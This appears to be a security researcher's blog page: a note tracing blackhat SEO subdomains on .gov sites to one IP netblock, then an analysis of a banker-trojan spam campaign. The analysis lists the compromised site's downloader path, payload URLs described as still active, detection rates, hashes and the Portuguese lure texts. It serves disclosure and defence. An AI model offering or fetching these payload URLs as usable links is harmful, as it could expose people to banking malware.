z1.z.vihfa.gov

Where's the connection between this blackhat SEO operation and the previous one? It's not just that both subdomains at the different .gov's are responding to IPs from the same netblock, but also, 89.28.13.202 is responding to City of Somerset's subdomains from the previous incident such as : j6.y.somersettx.gov; st9.x.somersettx.gov; x.somersettx.gov.

Looks like someone in Moldova will get spanked for these incidents.

Continue reading →

Targeted Spamming of Bankers Malware

This particular incident is interesting mostly because we have a good example that once a site gets compromised the potential for abusing the access for malware distribution becomes very realistic, this is in fact what happened with autobroker.com.pl, as the following URLs were active as of yesterday, now down due to notification. Basically, the compromised host, compromised in an automatic and efficient way for sure, started acting as the foundation for the campaign, which as it looks like was spammed in a targetted manner. A tiny php file at autobroker.com.pl/l.php was launching the downloader :

TROJ.BANLOAD
Result: 18/31 (58.07%)
File size: 46080 bytes
MD5: 690e71077c9d78347368c6cf8752741e
SHA1: 7dedad0778a24c69d6df4c8ceedc94f20292473e

the downloader then drops the following bankers that are strangely hosted on the French site Opus Citatum, and are still active :

opuscitatum.com/modules/PHP%20Files/__steampw12318897_.exe

Trojan-Spy.Win32.Banker.ciy
Result: 9/32 (28.13%)
File size: 2498560 bytes
MD5: cee1fdea650487e0865a1b8831db1e73
SHA1: ad55ff3e5519d88b930d6a0a695e71fcc253351e

opuscitatum.com/modules/PHP%20Files/Ivete_Sangalo.scr

Trojan.PWS.Banker
Result: 13/32 (40.63%)
File size: 2505216 bytes
MD5: 1bdb0d3e13b93c76e50b93db1adeed3e
SHA1: f472693da81202f4322425b952ec02cbff8d72bc

The campaign was originally spammed with the messages : "Chegou 1 vivo foto torpedo" and "Vivo torpedo foi enviado de um celular para seu e" by using the web based spammer you can see in the attached screenshot.

More info about banking malware, comments on a recently advertised metaphisher malware kit with banker trojans infected hosts only showcasing the malicious economies of scale botnet masters mentality, as well as related posts on targeted malware attacks. Continue reading →